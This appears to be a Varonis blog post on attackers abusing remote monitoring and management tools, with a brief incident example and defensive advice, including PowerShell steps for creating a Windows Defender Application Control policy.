RMM software allows IT professionals to manage networks remotely, troubleshoot problems, install software, and transfer files to and from devices
As remote work becomes the norm, IT departments worldwide face the challenge of managing devices spread across different cities and countries. To keep systems running smoothly, many organizations rely on VPNs and Remote Monitoring and Management (RMM) tools. While these tools offer convenience, they also present significant security risks, as cybercriminals can exploit them to gain unauthorised access to devices and data.
RMM software allows IT professionals to manage networks remotely, troubleshoot problems, install software, and transfer files to and from devices. This capability is essential for organizations with distributed workforces, as it simplifies many tasks that once required physical presence. However, the same features that make RMM tools invaluable to IT teams can be leveraged by malicious actors. If a connection isn’t secured properly, attackers can use these tools to access a victim’s device, execute commands, and extract data without detection.
Many cyber incidents investigated by Varonis last year revealed that ransomware-as-a-service (RaaS) groups have adopted a technique called “Living off the Land.” This method involves using legitimate IT tools, like RMM software, to control systems remotely, navigate networks undetected, and steal sensitive data. RMM tools enable attackers to blend in with normal network traffic, often bypassing security controls and organizational policies, such as application whitelisting. This tactic makes it easier for less experienced hackers, often referred to as “script kiddies,” to exploit networks using tools that are already installed and trusted by the system.
Our research has identified two primary methods that attackers use to exploit RMM tools. The first method involves abusing existing RMM tools. Attackers gain access to an organization’s network by exploiting vulnerabilities or weak credentials in preexisting RMM tools. This allows them to enter the network without raising alarms. The second method involves installing new RMM tools. Attackers may trick users into installing new RMM tools through phishing emails or social engineering tactics. Once installed, these tools provide the attackers with remote access to the network.
A recent investigation by Varonis’s Managed Data Detection and Response (MDDR) team found evidence of such exploitation. An organization discovered a compromised device with traces of an RMM tool called “KiTTY” in its PowerShell history. KiTTY, a modified version of the legitimate tool PuTTY, was used to create reverse tunnels over port 443, exposing internal servers to an AWS EC2 box. Since PuTTY is a trusted tool, the organization’s security software did not flag the activity as suspicious. The Varonis team’s analysis was crucial in tracing the attack chain, revealing how the breach occurred and what data was compromised. This investigation highlighted significant security gaps and emphasized the importance of addressing them to prevent future attacks.
Organisations can implement several strategies to reduce the risk of attackers exploiting RMM tools. One of the most effective measures is enforcing an application control policy. Here’s how it can be done: keep RMM tools updated and secure by ensuring that all RMM tools are regularly updated and patched. Access should be limited to authorized users with multi-factor authentication enabled. Another step is to block unnecessary connections by proactively blocking inbound and outbound connections on forbidden RMM ports and protocols at the network perimeter. Whitelisting applications using Windows Defender Application Control (WDAC) policies allows only trusted applications to run, reducing the risk of unauthorised software execution. To create a WDAC policy, you can follow these steps using PowerShell:
Open PowerShell with administrative privileges. Create a new policy using the `New-CIPolicy` cmdlet to scan a directory or file and create a policy that permits all files within that path, such as executables and DLL files. For example:
“`powershell
New-CIPolicy -FilePath “C:\Path\To\Application.exe” -Level Publisher -UserPEs -Fallback Hash -Enable -OutputFilePath “C:\Path\To\Policy.xml”
“`
Convert the policy to binary format using the `ConvertFrom-CIPolicy` cmdlet:
“`powershell
ConvertFrom-CIPolicy -XmlFilePath “C:\Path\To\Policy.xml” -BinaryFilePath “C:\Path\To\Policy.bin”
“`
Deploy the policy using the Group Policy Management Console (GPMC) by copying the `.bin` file to the `\\Windows\System32\CodeIntegrity` directory on target computers. Configure Group Policy to enforce the policy.
Continuous monitoring of network traffic and logs is essential, especially regarding RMM tools. Services like Varonis MDDR offer 24/7 network monitoring and behavioral analysis to identify suspicious activities promptly. Educating employees about cybersecurity risks is vital. Training should focus on recognising phishing attempts, managing passwords securely, and reporting suspicious activities. Regular testing can help identify vulnerabilities and improve the organization’s overall security posture.
As technology evolves, so do the tactics of both defenders and attackers. RMM tools are just one example of the potential threats organizations face. Varonis aims to protect what matters most: your data. Our all-in-one Data Security Platform continuously discovers and classifies critical data, mitigates exposures, and neutralises threats in real time with AI-powered automation. Curious about the potential risks lurking in your environment? Consider a Varonis Data Risk Assessment. Our free assessment is quick to set up and offers immediate insights. In less than 24 hours, you’ll receive a clear view of the data that matters most and actionable steps for remediation.
While RMM tools are essential for managing remote networks, they also pose significant security challenges. By understanding these risks and implementing robust security measures, organisations can better protect themselves from potential threats. Continuous monitoring, strict application control policies, and user education are critical components in safeguarding against RMM exploits.
